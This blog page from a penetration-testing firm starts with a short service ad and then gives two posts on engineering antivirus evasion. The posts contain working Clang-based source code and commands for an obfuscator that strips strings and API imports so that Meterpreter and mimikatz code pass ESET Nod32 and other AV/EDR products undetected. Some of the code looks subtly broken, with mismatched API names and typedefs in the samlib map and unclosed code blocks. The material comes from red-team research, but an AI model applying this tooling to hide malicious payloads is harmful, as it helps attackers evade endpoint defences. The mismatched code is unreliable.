Continuous Pentesting

At SCRT, we have been performing penetration tests for nearly 20 years now and have always tried to improve our methodologies to match client expectations and deliver the most accurate and useful results from each test we undertake.

Over the last few years, Bug bounty programs have been making a name for themselves as they bring a new approach to assessing the security level of a company, application or system. They allow for a more continuous, albeit less controlled, testing of a targeted scope.

Some people will probably argue that bug bounties and pentests are antagonistic, while I believe that they are two very complementary approaches for achieving a better overall security level. Mature companies tend to move towards a system where penetration tests are performed to discover vulnerabilities and essentially verify the security level of an application or system when it is deployed or updated, and a bug bounty program is then used to ensure a sort of continuous monitoring from a larger population of bug hunters.

There are advantages and drawbacks to both pentesting and bug bounties, which is why they can be used together to achieve better results. I’ve attempted to compare both options in a rather simplified manner, while trying to emphasize where each option outperforms the other.

Obviously some people will disagree with what is considered as an advantage and what isn’t but I have tried to remain as neutral as possible and typically, when it comes to costs, the fact they are essentially unknown and entirely dependent on the number of vulnerabilities and their classification in a bug bounty program will be seen as a clear advantage for some and an inconvenient for others, which is why I’ll let you decide where you stand on that issue.

The same goes for the duration. I would tend to believe that an unlimited test would be more interesting than a limited one, but it also means that the company must be able to react to potential incidents at any time and coordinate more closely with the SOC.

We have noticed that many companies are reluctant to setting up a bug bounty program. Having helped in organising and managing the Public Intrusion Test (PIT) for the Swiss e-voting system last year (which was essentially a temporary bug bounty program), we also understand why. The main issues we ran into can be summarised as such:

  • Poor quality and out of scope submissions
  • Difficult to know how many people (if any) will actually look at the system
  • Difficulty to establish a trust relationship with the participants as they are essentially anonymous
  • Difficulty to define the bounty amounts and control costs (although this wasn’t done by us in this case)

Now I know most Bug bounty platforms will attempt to help companies in managing these issues, but we felt there was a way SCRT could also help our clients bridge the gap between traditional pentesting and bug bounties. This is where our Continuous pentesting offer comes in.

The idea is to take the advantages of both the pentesting and bug bounty worlds while minimising the drawbacks. The main advantage of this system is that whatever elements are included in the scope are assured to be tested by a rotating pool of trusted SCRT engineers at various times throughout the year.

Regarding costs, we are sticking to a more traditional pentesting approach, where we will be using a per-day rather than per-vulnerability model so as to fully control the costs of the tests beforehand.

We cannot provide a 24/7 monitoring of all vulnerabilities within a specific scope, but by avoiding pre-planned dates, it gives us the flexibility to test when new vulnerabilities or types of attacks emerge so that we can verify whether or not your systems are affected in a more dynamic and proactive way.

If you’re interested in this approach, feel free to contact us to get additional details and see how we can best adapt our offer to your requirements.

Engineering antivirus evasion (Part II)

tl;dr To interact with the Windows operating system, software often import functions from Dynamic Link Libraries (DLL). These functions are listed in clear-text in a table called Import Address Table and antivirus software tend to capitalise on that to infer malicious behavioural detection. We show ideas and implementation of an obfuscator that allows to refactor any C/C++ software to remove this footprint, with a focus on Meterpreter. The source code is available at


In a previous blog post, we showed how to replace string literals in source code accurately without using regexes. The goal is to reduce the footprint of a binary and blind security software that relies on static signatures.

However, apart from string literals in the source code itself, there are plenty of other fingerprints that can be collected and analysed statically. In this blog post, we will show how one can hide API imports manually from a binary, and then automate the process for every software written in C/C++.

The problem with API imports

Let us write and build a simple C program that pops up an alert box:

#include <Windows.h>
int main(int argc, char** argv) { 
    MessageBox(NULL, "Test", "Something", MB_OK);
    return 0;

Then, build with your favorite compiler. Here, MinGW is used to cross-build from macOS to Windows:

x86_64-w64-mingw32-gcc test.c -o /tmp/toto.exe

Afterwards, one can list the strings using rabin2 (included in radare2), or even the GNU strings utility:

rabin2 -zz /tmp/toto.exe | bat

 205   │ 201  0x00003c92 0x00408692 7   8    .idata        ascii   strncmp
 206   │ 202  0x00003c9c 0x0040869c 8   9    .idata        ascii   vfprintf
 207   │ 203  0x00003ca8 0x004086a8 11  12   .idata        ascii   MessageBoxA
 208   │ 204  0x00003d10 0x00408710 12  13   .idata        ascii   KERNEL32.dll
 209   │ 205  0x00003d84 0x00408784 10  11   .idata        ascii   msvcrt.dll
 210   │ 206  0x00003d94 0x00408794 10  11   .idata        ascii   USER32.dll

9557   │ 9553 0x0004f481 0x00458e81 30  31                 ascii   .refptr.__native_startup_state
9558   │ 9554 0x0004f4a0 0x00458ea0 11  12                 ascii   __ImageBase
9559   │ 9555 0x0004f4ac 0x00458eac 11  12                 ascii   MessageBoxA
9560   │ 9556 0x0004f4b8 0x00458eb8 12  13                 ascii   GetLastError
9561   │ 9557 0x0004f4c5 0x00458ec5 17  18                 ascii   __imp_MessageBoxA
9562   │ 9558 0x0004f4d7 0x00458ed7 23  24                 ascii   GetSystemTimeAsFileTime
9563   │ 9559 0x0004f4ef 0x00458eef 22  23                 ascii   mingw_initltssuo_force
9564   │ 9560 0x0004f506 0x00458f06 19  20                 ascii   __rt_psrelocs_start

As evident from the console output shown above, the string MessageBoxA appears three times. This is due to the fact that this function must be imported from the library User32.dll (more on this later).

Of course, this string in particular is not susceptible to raise an antivirus’ eyebrows, but that would definitely be the case for APIs such as:

  • InternetReadFile
  • ShellExecute
  • CreateRemoteThread
  • OpenProcess
  • ReadProcessMemory
  • WriteProcessMemory

Hiding API imports

Before going further, let us recapitulate the different ways available to developers to call functions in external libraries on Windows systems [1]:

  • Load-time dynamic linking.
  • Run-time dynamic linking.

Load-time dynamic linking

This is the default approach to resolve function in external libraries and is actually taken care of automatically by the linker. During the build cycle, the application is linked against the import library (.lib) of each Dynamic Link Library (DLL) it depends on. For each imported function, the linker writes an entry into the IAT for the associated DLL.

When the application is started, the operating system scans the IAT and maps all the libraries listed there in the process’ address space, and the addresses of each imported function is updated to point to the corresponding entry in the DLL’s Export Address Table.

Import Address Table (IAT)

Run-time dynamic linking

An alternative is to do it manually by first loading the corresponding library with LoadLibrary, and then resolving the function’s address with GetProcAddress. For instance, the previous example can be adapted in order to rely on run-time dynamic linking.

First, it is necessary to define a function pointer for the API MessageBoxA. Before jumping into that, let us share a small trick to remember the syntax of function pointers in C for those of us that find it unintuitive:

<return type> (*<your pointer name>)(arg1, arg2, ...);

As you can see, it is the same syntax used to define functions, apart from the star operator (because it is a function pointer) and the parenthesis.

Now, we need the prototype of MessageBox, which can be copy-pasted from winuser.h from the Windows SDK or straight from MSDN:

int MessageBox(
  HWND    hWnd,
  LPCTSTR lpText,
  LPCTSTR lpCaption,
  UINT    uType

Now, the aforementioned function pointer syntax can be updated with the correct information:

int (*_MessageBoxA)(
    HWND hWnd,
    LPCTSTR lpText,
    LPCTSTR lpCaption,
    UINT uType

MSDN tells us that this function is exported by User32.dll:

The API MessageBoxA is exported by User32.dll.

So, the application must first load this library:

HANDLE hUser32 = LoadLibrary("User32.dll");

Then, GetProcAddress can finally be used to assign the correct address to the function pointer defined above:

_MessageBoxA fMessageBoxA = (_MessageBoxA) GetProcAddress(hUser32, "MessageBoxA");

From there, the original example must be adapted to call fMessageBoxA instead of MessageBoxA, which gives:

#include <Windows.h>

typedef int (*_MessageBoxA)(
  HWND    hWnd,
  LPCTSTR lpText,
  LPCTSTR lpCaption,
  UINT    uType

int main(int argc, char** argv) {

    HANDLE hUser32 = LoadLibraryA("User32.dll");
    _MessageBoxA fMessageBoxA = (_MessageBoxA) GetProcAddress(hUser32, "MessageBoxA");
    fMessageBoxA(NULL, "Test", "Something", MB_OK);
    return 0;

The Windows.h include is only required for the data types HWND, LPCTSTR and UINT. Building and running this simple example spawns an alert box, as expected:

Simplest example of using LoadLibrary and GetProcAddress for run-time dynamic linking.

Final adaptation

Of course, running strings on toto.exe will still yield the strings “User32.dll” and “MessageBoxA”. So, those strings should ideally be encrypted, but the simple obfuscation trick shown in the previous blog post suffices to bypass antivirus detection. The end result would be:

#include <Windows.h>

typedef int (*_MessageBoxA)(
  HWND    hWnd,
  LPCTSTR lpText,
  LPCTSTR lpCaption,
  UINT    uType

int main(int argc, char** argv) {

    char user32[] = {'U','s','e','r','3','2','.','d','l','l',0};
    HANDLE hUser32 = LoadLibraryA(user32);

    char messabox[] = {'M','e','s','s','a','g','e','B','o','x','A',0};
    _MessageBoxA fMessageBoxA = (_MessageBoxA) GetProcAddress(hUser32, messabox);
    fMessageBoxA(NULL, "Test", "Something", MB_OK);
    return 0;

This time, neither strings nor rabin2 are able to find the string (although a reverse-engineer sure will):

➜  x86_64-w64-mingw32-gcc test.c -o /tmp/toto.exe
➜  strings /tmp/toto.exe | grep MessageBox
➜  rabin2 -zz /tmp/toto.exe | grep MessageBox

Automated source code refactoring

The same approach lengthily described in the previous blog post can be used to refactor an existing code-base, so that suspicious API are loaded at runtime and removed from the Import Address Table. To do that, we will build upon the existing work realised with libTooling.

Let us break down this task as follows:

  • Generate the Abstract Syntax Tree for the previous, original example. This is required to understand how to manipulate the nodes to replace a function call.
  • Locate all the function calls in a code-base for a given API with an ASTMatcher.
  • Replace all the calls with another function identifier.
  • Insert LoadLibrary / GetprocAddress calls just before each function call.
  • Check that it works.
  • Generalise and obfuscate all the suspicious API.

The MessageBox application’s Abstract Syntax Tree

To view Clang’s Abstract Syntax Tree for the original MessageBox application, let us use that script (adapt the path to your Windows SDK):


clang -cc1 -ast-dump "$1" -D "_WIN64" -D "_UNICODE" -D "UNICODE" -D "_WINSOCK_DEPRECATED_NO_WARNINGS"\
  "-I" "$CLANG_PATH/include" \
  "-I" "$CLANG_PATH" \
  "-I" "$WIN_INCLUDE/Include/msvc-14.15.26726-include"\
  "-I" "$WIN_INCLUDE/Include/10.0.17134.0/ucrt" \
  "-I" "$WIN_INCLUDE/Include/10.0.17134.0/shared" \
  "-I" "$WIN_INCLUDE/Include/10.0.17134.0/um" \
  "-I" "$WIN_INCLUDE/Include/10.0.17134.0/winrt" \
  "-fdeprecated-macro" \
  "-w" \
  "-fno-use-cxa-atexit" "-fms-extensions" "-fms-compatibility" \
  "-fms-compatibility-version=19.15.26726" "-std=c++14" "-fdelayed-template-parsing" "-fobjc-runtime=gcc" "-fcxx-exceptions" "-fexceptions" "-fseh-exceptions" "-fdiagnostics-show-option" "-fcolor-diagnostics" "-x" "c++"

And run it:

bash test/messagebox_simple.c > test/messagebox_simple.c.ast
Clang Abstract Syntax Tree for a simple application that calls the API MessageBoxA.

Locating function calls in source code basically amounts to finding AST nodes of type CallExpr. As pictured on the screenshot above, the function name that is actually called is specified in one of its child nodes, so it should be possible to access it later on.

Locate function calls for a given API

ASTMatcher is just what we need in order to enumerate every function call to a given function. First, it is important to get the syntax right for this matcher, since it is a bit more complicated that the one used in the previous blog post. To get it right, I relied on clang-query, which is an invaluable interactive tool that allows to run custom queries on source code. Interestingly, it is also based on libTooling and is much more powerful than what is showcased in this blog post (see [2]).

clang-query> match callExpr(callee(functionDecl(hasName("MessageBoxA"))))

Match #1:

/Users/vladimir/dev/scrt/avcleaner/test/messagebox_simple.c:6:5: note: "root" binds here
    MessageBoxA(NULL, "Test", "Something", MB_OK);
1 match.

Trial-and-error and tab completion suffice to converge quickly to a working solution. Now that the matcher is proven to work well, we can create a new ASTConsumer just like we did in the previous blog post. Basically, its job is to reproduce what we did with clang-query, but in C++:

class ApiCallConsumer : public clang::ASTConsumer {

    ApiCallConsumer(std::string ApiName, std::string TypeDef, std::string Library)
            : _ApiName(std::move(ApiName)), _TypeDef(std::move(TypeDef)), _Library(std::move(Library)) {}

    void HandleTranslationUnit(clang::ASTContext &Context) override {
        using namespace clang::ast_matchers;
        using namespace AVObfuscator;

        llvm::outs() << "[ApiCallObfuscation] Registering ASTMatcher for " << _ApiName << "\n";
        MatchFinder Finder;
        ApiMatchHandler Handler(&ASTRewriter, _ApiName, _TypeDef, _Library);

        const auto Matcher = callExpr(callee(functionDecl(hasName(_ApiName)))).bind("callExpr");

        Finder.addMatcher(Matcher, &Handler);

    std::string _ApiName;
    std::string _TypeDef;
    std::string _Library;

An implementation detail that we found important was to offer the possibility to match many different functions, and since the end game is to insert LoadLibrary / GetProcAddress for each replaced API function, we need to be able to supply the DLL name along the function prototype.

Doing so allows to elegantly register as many ASTConsumers as there are API to replace. Instantiation of this ASTConsumer must be done in the ASTFrontendAction:

Minor modifications of main.cpp.

This is the only modification required on the existing code that we did in the previous blog post. From there, everything else can be realised as a bunch of code that we will add, starting with the creation of ApiMatchHandler.cpp.
The matcher must be provided with a callback function, so let us give it one:

void ApiMatchHandler::run(const MatchResult &Result) {

    llvm::outs() << "Found " << _ApiName << "\n";

    const auto *CallExpression = Result.Nodes.getNodeAs<clang::CallExpr>("callExpr");
    handleCallExpr(CallExpression, Result.Context);

The task broken down as a list of steps in the beginning of the section can be transposed in code, for instance with the following methods:

bool handleCallExpr(const clang::CallExpr *CallExpression, clang::ASTContext *const pContext);

bool replaceIdentifier(const clang::CallExpr *CallExpression, const std::string &ApiName,
                        const std::string &NewIdentifier);
addGetProcAddress(const clang::CallExpr *pCallExpression, clang::ASTContext *const pContext,
                    const std::string &NewIdentifier, std::string &ApiName);

clang::SourceRange findInjectionSpot(clang::ASTContext *const Context, clang::ast_type_traits::DynTypedNode Parent,
                                        const clang::CallExpr &Literal, uint64_t Iterations);

Replace function calls

This is the most trivial part. The goal is to replace “MessageBoxA” in the AST with a random identifier. Initialisation of this random variable is done in the subsequent section.

bool ApiMatchHandler::handleCallExpr(const CallExpr *CallExpression, clang::ASTContext *const pContext) {

    // generate a random variable name
    std::string Replacement = Utils::translateStringToIdentifier(_ApiName);

    // inject Run-time dynamic linking
    if (!addGetProcAddress(CallExpression, pContext, Replacement, _ApiName))
        return false;

    // MessageBoxA -> random identifier generated above
    return replaceIdentifier(CallExpression, _ApiName, Replacement);

The ReplaceText Clang AP is used to rename the function identifier:

bool ApiMatchHandler::replaceIdentifier(const CallExpr *CallExpression, const std::string &ApiName,
                                        const std::string &NewIdentifier) {
    return this->ASTRewriter->ReplaceText(CallExpression->getBeginLoc(), ApiName.length(), NewIdentifier);

Insert LoadLibrary / GetProcAddress

Injecting Run-time dynamic linking for the API that we would like to add is a multi-step process:

  • Insert the API prototype, either at the top of the translation unit or in the enclosing function. To keep it simple, we opt for the latter, but we need to ensure that it was not already added in case the API is called several times in the same function, which would happen if there are subsequent calls to the same API.
  • Insert the line HANDLE <random identifier> LoadLibrary(<library name>);
  • Insert the call to GetProcAddress.

Of course, to avoid inserting obvious string literals while doing this, each string must be written as a stack string instead. This makes the code a bit tedious to read but nothing too complex:

bool ApiMatchHandler::addGetProcAddress(const clang::CallExpr *pCallExpression, clang::ASTContext *const pContext,
                                        const std::string &NewIdentifier, std::string &ApiName) {

    SourceRange EnclosingFunctionRange = findInjectionSpot(pContext, clang::ast_type_traits::DynTypedNode(),
                                                           *pCallExpression, 0);

    std::stringstream Result;

    // add function prototype if not already added
    if(std::find(TypedefAdded.begin(), TypedefAdded.end(), pCallExpression->getDirectCallee()) == TypedefAdded.end()) {

        Result << "\t" << _TypeDef << "\n";

    // add LoadLibrary with obfuscated strings
    std::string LoadLibraryVariable = Utils::translateStringToIdentifier(_Library);
    std::string LoadLibraryString = Utils::generateVariableDeclaration(LoadLibraryVariable, _Library);
    std::string LoadLibraryHandleIdentifier = Utils::translateStringToIdentifier("hHandle_"+_Library);
    Result << "\t" << LoadLibraryString << std::endl;
    Result << "\tHANDLE " << LoadLibraryHandleIdentifier << " = LoadLibrary(" << LoadLibraryVariable << ");\n";

    // add GetProcAddress with obfuscated string: TypeDef NewIdentifier = (TypeDef) GetProcAddress(handleIdentifier, ApiName)
    std::string ApiNameIdentifier = Utils::translateStringToIdentifier(ApiName);
    std::string ApiNameDecl = Utils::generateVariableDeclaration(ApiNameIdentifier, ApiName);
    Result << "\t" << ApiNameDecl << "\n";
    Result << "\t_ "<< ApiName << " " << NewIdentifier << " = (_" << ApiName << ") GetProcAddress("
           << LoadLibraryHandleIdentifier << ", " << ApiNameIdentifier << ");\n";


    // add everything at the beginning of the function.
    return !(ASTRewriter->InsertText(EnclosingFunctionRange.getBegin(), Result.str()));


git clone
mkdir avcleaner/CMakeBuild && cd avcleaner/CMakeBuild
cmake ..
cd ..

To test that everything works as expected, the following test file is used:

#include <Windows.h>

int main(int argc, char** argv) {

    MessageBoxA(NULL, "Test", "Something", MB_OK);
    MessageBoxA(NULL, "Another test", "Another something", MB_OK);
    return 0;

Run the obfuscator:

./CMakeBuild/avcleaner.bin test/messagebox_simple.c --strings=true --api=true -- -D _WIN64 -D _UNICODE -D UNICODE -D _WINSOCK_DEPRECATED_NO_WARNINGS\
 -I /usr/local/Cellar/llvm/9.0.1\
 -I /Users/vladimir/dev/scrt/avcleaner/Include/msvc-14.15.26726-include\
 -I /Users/vladimir/dev/scrt/avcleaner/Include/10.0.17134.0/ucrt\
 -I /Users/vladimir/dev/scrt/avcleaner/Include/10.0.17134.0/shared\
 -I /Users/vladimir/dev/scrt/avcleaner/Include/10.0.17134.0/um\
 -I /Users/vladimir/dev/scrt/avcleaner/Include/10.0.17134.0/winrt -w -fdebug-compilation-dir -fno-use-cxa-atexit -fms-extensions -fms-compatibility -fms-compatibility-version=19.15.26726 -std=c++14 -fdelayed-template-parsing -fobjc-runtime=gcc -fcxx-exceptions -fexceptions -fdiagnostics-show-option -fcolor-diagnostics -x c++ -ferror-limit=1900 -target x86_64-pc-windows-msvc19.15.26726 -fsyntax-only -disable-free -disable-llvm-verifier -discard-value-names -dwarf-column-info -debugger-tuning=gdb -momit-leaf-frame-pointer -v

Inspect the result:

#include <Windows.h>

int main(int argc, char** argv) {
	const char  hid_Someth_lNGj92poubUG[] = {'\x53','\x6f','\x6d','\x65','\x74','\x68','\x69','\x6e','\x67',0};

	const char  hid_Anothe_UP7KUo4Sa8LC[] = {'\x41','\x6e','\x6f','\x74','\x68','\x65','\x72','\x20','\x74','\x65','\x73','\x74',0};

	const char  hid_Anothe_ACsNhmIcS1tA[] = {'\x41','\x6e','\x6f','\x74','\x68','\x65','\x72','\x20','\x73','\x6f','\x6d','\x65','\x74','\x68','\x69','\x6e','\x67',0};
	typedef int (*_MessageBoxA)(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType);
	TCHAR hid_User___Bhk5rL2239Kc[] = {'\x55','\x73','\x65','\x72','\x33','\x32','\x2e','\x64','\x6c','\x6c',0};

	HANDLE hid_hHandl_PFP2JD4HjR8w = LoadLibrary(hid_User___Bhk5rL2239Kc);
	TCHAR hid_Messag_drqxgJLSrxfT[] = {'\x4d','\x65','\x73','\x73','\x61','\x67','\x65','\x42','\x6f','\x78','\x41',0};

	_MessageBoxA hid_Messag_1W70P1kc8OJv = (_MessageBoxA) GetProcAddress(hid_hHandl_PFP2JD4HjR8w, hid_Messag_drqxgJLSrxfT);
	TCHAR hid_User___EMmJBb201EuJ[] = {'\x55','\x73','\x65','\x72','\x33','\x32','\x2e','\x64','\x6c','\x6c',0};

	HANDLE hid_hHandl_vU1riOrVWM8g = LoadLibrary(hid_User___EMmJBb201EuJ);
	TCHAR hid_Messag_GoaJMFscXsdw[] = {'\x4d','\x65','\x73','\x73','\x61','\x67','\x65','\x42','\x6f','\x78','\x41',0};

	_MessageBoxA hid_Messag_6nzSLR0dttUn = (_MessageBoxA) GetProcAddress(hid_hHandl_vU1riOrVWM8g, hid_Messag_GoaJMFscXsdw);
hid_Messag_1W70P1kc8OJv(NULL, "Test", hid_Someth_lNGj92poubUG, MB_OK);
    hid_Messag_6nzSLR0dttUn(NULL, hid_Anothe_UP7KUo4Sa8LC, hid_Anothe_ACsNhmIcS1tA, MB_OK);
    return 0;

As you can see, the combination of both the string obfuscation and API obfuscation passes are quite powerful. The string “Test” was left out because we decided to ignore small strings. Then, the obfuscated source code can be built:

$ cp test/messagebox_simple.c.patch /tmp/test.c
$ x86_64-w64-mingw32-gcc /tmp/test.c -o /tmp/toto.exe

Testing on a Windows 10 virtual machine showed that the original features were kept functional. More importantly, there are no “MessageBox” strings in the obfuscated binary:

$ rabin2 -zz /tmp/toto.exe | grep MessageBox | wc -l


With regard to the antivirus ESET Nod32, we discovered that it was important to hide API imports related to samlib.dll, especially the APIs in the list below:

  • SamConnect
  • SamConnectWithCreds
  • SamEnumerateDomainsInSamServer
  • SamLookupDomainInSamServer
  • SamOpenDomain
  • SamOpenUser
  • SamOpenGroup
  • SamOpenAlias
  • SamQueryInformationUser
  • SamSetInformationUser
  • SamiChangePasswordUser
  • SamGetGroupsForUser
  • SamGetAliasMembership
  • SamGetMembersInGroup
  • SamGetMembersInAlias
  • SamEnumerateUsersInDomain
  • SamEnumerateGroupsInDomain
  • SamEnumerateAliasesInDomain
  • SamLookupNamesInDomain
  • SamLookupIdsInDomain
  • SamRidToSid
  • SamCloseHandle
  • SamFreeMemory

These functions are not black-listed anywhere in the AV engine as far as we could tell, but they do somehow increase the internal detection confidence score. So, we must register an ApiCallConsumer for each of these functions, which means that we need their names and their function prototypes:

static std::map<std::string, std::string> ApiToHide_samlib = {
    {"SamConnect",                     "typedef NTSTATUS (__stdcall* _SamEnumerateDomainsInSamServer)(SAMPR_HANDLE ServerHandle, DWORD * EnumerationContext, PSAMPR_RID_ENUMERATION* Buffer, DWORD PreferedMaximumLength,DWORD * CountReturned);"},
    {"SamConnectWithCreds",            "typedef NTSTATUS(__stdcall* _SamConnect)(PUNICODE_STRING ServerName, SAMPR_HANDLE * ServerHandle, ACCESS_MASK DesiredAccess, BOOLEAN Trusted);"},
    {"SamEnumerateDomainsInSamServer", "typedef NTSTATUS(__stdcall* _SamConnectWithCreds)(PUNICODE_STRING ServerName, SAMPR_HANDLE * ServerHandle, ACCESS_MASK DesiredAccess, LSA_OBJECT_ATTRIBUTES * ObjectAttributes, RPC_AUTH_IDENTITY_HANDLE AuthIdentity, PWSTR ServerPrincName, ULONG * unk0);"},

And then, we update main.cpp to iterate over this collection and handle each one:

for(auto const& el: ApiToHide_samlib){

    auto Cons = std::make_unique<ApiCallConsumer*>(new ApiCallConsumer(el.first, el.second,

Here, std::make_unique is invaluable because it allows us to instantiate objects on the heap in this loop, while sparing us the effort to manually free those objects later on. They will be freed automatically when they are no longer used.

Finally, we can battle test the obfuscator against mimikatz, especially kuhl_m_lsadump.c:

bash test/kuhl_m_lsadump.c

This produce an interesting result:

Run-time dynamic linking for API imported from samlib.dll

Actual function calls are correctly replaced:

Function calls imported from samlib.dll are correctly replaced.

The strings inside the macro “PRINT_ERROR” were left out because we noped out this macro with a do{}while(0). As a side note, we did not find a better project to find bugs in the obfuscator than mimikatz. The code style is indeed quite exotic 🙂 .


Here are some exercices left to the reader 🙂

More stealth

You don’t actually need the API LoadLibrary / GetProcAddress to perform run-time dynamic linking.

It is best to reimplement these functions to avoid hooks, and there already are open-source projects that allow you to do that (ReflectiveDLLInjection).

If you managed to read this far, you know that you only have to inject an implementation for these functions at the top of the translation unit (with findInjectionSpot) and update the method addGetProcAddress to use your implementation instead of the WinAPI.

Error handling

  • LoadLibrary returns NULL in case it was not successful, so it is possible to add a check for this and gracefully recover from this error. In the current situation, the application may very well crash.
  • GetProcAddress also returns NULL in case of errors and it is important to check for this as well.


In this blog post, we showed how it is possible to accurately replace function calls in C/C++ code-bases without using regexes. All of that was realised to prevent antivirus software to statically collect behaviour information about Meterpreter or other software that we use during our pentesting engagements.

Applied to ESET Nod32, this was a key step to allow every Meterpreter modules to go through its net undetected, and was definitely helpful for the more advanced products.

Hiding API imports is one thing, but once the malware executes, there are ways for a security software to gather behavioural information by monitoring API calls.

In view of that, the next blog post will be about automated refactoring of suspicious Win32 APIs to direct syscalls. This is another key step to circumvent run-time detection realised with userland hooks for AV such as Cylance, Traps and Kaspersky.


[1] The Rootkit Arsenal, Chapter 11, p.480.

Vladimir Meier

Engineering antivirus evasion

tl;dr: this blog post documents some aspects of our research on antivirus software and how we managed to automatically refactor Meterpreter to bypass every AV/EDR we were put up against. While the ideas for every technique and the implementation of the string obfuscation pass are detailed below, we decided to publish details on API imports hiding / syscalls rewriting in future blog posts to keep this one as short as possible. The source code is available at

Among the defensive measures a company can implement to protect its information systems against attacks, security software such as antivirus or EDR often come up as an essential toolset to have. While it used to be rather easy to circumvent any kind of malware detection mechanism in the past years, doing so nowadays certainly involves more effort.

On the other hand, communicating about the risks associated with a vulnerability is really challenging in case the Proof-of-Concept to exploit it is itself blocked by an antivirus. While one can claim that it is always theoretically possible to bypass the detection [1] and leave it at that, actually doing it may add some strength to the argument.

In addition, there are vulnerabilities that can only be discovered with an existing foothold on a system. For example, in the case where a pentester is not able to get that initial level of access, the audit’s result would not accurately depict the actual security level of the systems in scope.

In view of that, there is a need to be able to circumvent antivirus software. To complicate things, at SCRT we rely on publicly available, open-source tools whenever possible, to emphasise that our work is reproducible by anyone skilled enough to use them, and does not depend on private, expensive tools.

Problem statement

The community likes to categorise the detection mechanisms of any antivirus as being “static” or “dynamic”. Generally, if detection is triggered before the malware’s execution, it is seen as a kind of static detection.
However, it is worth knowing that a static detection mechanism such as signatures can be invoked during the malware’s execution in reaction to events such as process creations, in-memory file downloads, and so on.
In any case, if we want to use the good old Meterpreter against any kind of security software, we must modify it in such a way that it fulfills the following requirements:

  • Bypass any static signature, whether during a filesystem scan or a memory scan.
  • Bypass “behavioural detection” which, more often than not, relates to evading userland API hooking.

However, Meterpreter comprises several modules, and the whole codebase amounts to around 700’000 lines of code. In addition, it is constantly updated, which means running a private fork of the project is sure to scale very poorly.

In short, we need a way to transform the codebase automatically.


After years of experience bypassing antivirus software, if there is any kind of insight that we could share with the community, it would be that a malware detection is almost always trivially based on strings, API hooks, or a combination of both.

Even for the products that implement machine learning classifiers such as Cylance, a malware that does not have strings, API imports and hookable API calls is sure to go through the net like a soccer ball through Sergio Rico’s defence.

Meterpreter has thousands of strings, API imports are not hidden in any way and sensitive APIs such as “WriteProcessMemory” can be intercepted easily with a userland API hook. So, we need to remedy that in an automated fashion, which yields two potential solutions:

  • Source-to-source code refactoring
  • LLVM passes to obfuscate the code base at compilation time.

The latter would be the preferred approach, and many popular researches reached the same conclusion [2]. The main reason is that a transformation pass can be written once and reused independently of the software’s programming language or target architecture.

Image from:

However, doing so requires the ability to compile Meterpreter with a compiler other than Visual Studio. While we have published some work to change that in December 2018, adoption in the official codebase is still an ongoing process more than a year later.

In the meantime, we have decided to implement the first approach out of spite. After a thorough review of the state-of-the-art of source code refactoring, libTooling (part of the Clang/LLVM toolchain) appeared to be the only viable candidate to parse C/C++ source code and modify it.

Note: since the codebase is strongly Visual Studio dependent, Clang will fail to parse a large part of Metepreter. However, it was still possible to bypass the target antivirus with that half-success. And here we probably have the only advantage of source-to-source transformation over compile-time transformation: the latter requires the whole project to compile without any errors. The former is resilient to thousands of compilation errors; you just end up with an incomplete Abstract Syntax Tree, which is perfectly fine.

LLVM passes vs libTooling

String obfuscation

In C/C++, a string may be located in many different contexts. libTooling is not really pleasurable to toy with, so we have applied Pareto’s Law and limited ourselves to those that cover the most suspicious string occurrences within Meterpreter’s codebase:

  • Function arguments
  • List initializers

Function arguments

For instance, we know for a fact that ESET Nod32 will flag the string “ntdll” as being suspicious in the following context:

ntdll = LoadLibrary(TEXT("ntdll"))

However, rewriting this code snippet in the following manner successfully bypasses the detection:

wchar_t ntdll_str[] = {'n','t','d','l','l',0};
ntdll = LoadLibrary(ntdll_str)

Behind the scenes, the first snippet will cause the string “ntdll” to be stored inside the .rdata section of the resulting binary, and can be easily spotted by the antivirus. The second snippet will cause the string to be stored on the stack at runtime, and is statically indistinguishable from code, at least in the general case. IDA Pro or alternatives are often able to recognise the string, but they also run more advanced and computationally intensive analyses on the binary.

List initializers

In Meterpreter’s codebase, this kind of construct can be found in several files, for instance in c/meterpreter/source/extensions/extapi/extapi.c:

Command customCommands[] =
COMMAND_REQ("extapi_window_enum", request_window_enum),
COMMAND_REQ("extapi_service_enum", request_service_enum),
COMMAND_REQ("extapi_service_query", request_service_query),
COMMAND_REQ("extapi_service_control", request_service_control),
COMMAND_REQ("extapi_clipboard_get_data", request_clipboard_get_data),
COMMAND_REQ("extapi_clipboard_set_data", request_clipboard_set_data),
COMMAND_REQ("extapi_clipboard_monitor_start", request_clipboard_monitor_start),
COMMAND_REQ("extapi_clipboard_monitor_pause", request_clipboard_monitor_pause),
COMMAND_REQ("extapi_clipboard_monitor_resume", request_clipboard_monitor_resume),
COMMAND_REQ("extapi_clipboard_monitor_purge", request_clipboard_monitor_purge),
COMMAND_REQ("extapi_clipboard_monitor_stop", request_clipboard_monitor_stop),
COMMAND_REQ("extapi_clipboard_monitor_dump", request_clipboard_monitor_dump),
COMMAND_REQ("extapi_adsi_domain_query", request_adsi_domain_query),
COMMAND_REQ("extapi_ntds_parse", ntds_parse),
COMMAND_REQ("extapi_wmi_query", request_wmi_query),
COMMAND_REQ("extapi_pageant_send_query", request_pageant_send_query),

Those strings will be stored in clear-text in the .rdata section of ext_server_espia.x64.dll and picked up by ESET Nod32 for instance.

To make things worse, those strings are parameters to a macro, located in a list initialiser. This introduces a bunch of tricky corner cases that are not obvious to overcome. The goal is to rewrite this snippet automatically as follows:

char hid_extapi_UQOoNXigAPq4[] = {'e','x','t','a','p','i','_','w','i','n','d','o','w','_','e','n','u','m',0};
char hid_extapi_vhFHmZ8u2hfz[] = {'e','x','t','a','p','i','_','s','e','r','v','i','c','e','_','e','n','u','m',0};
char hid_extapi_pW25eeIGBeru[] = {'e','x','t','a','p','i','_','s','e','r','v','i','c','e','_','q','u','e','r','y'
char hid_extapi_S4Ws57MYBjib[] = {'e','x','t','a','p','i','_','s','e','r','v','i','c','e','_','c','o','n','t','r'
char hid_extapi_HJ0lD9Dl56A4[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','g','e','t'
char hid_extapi_IiEzXils3UsR[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','s','e','t'
char hid_extapi_czLOBo0HcqCP[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n'
char hid_extapi_WcWbTrsQujiT[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n'
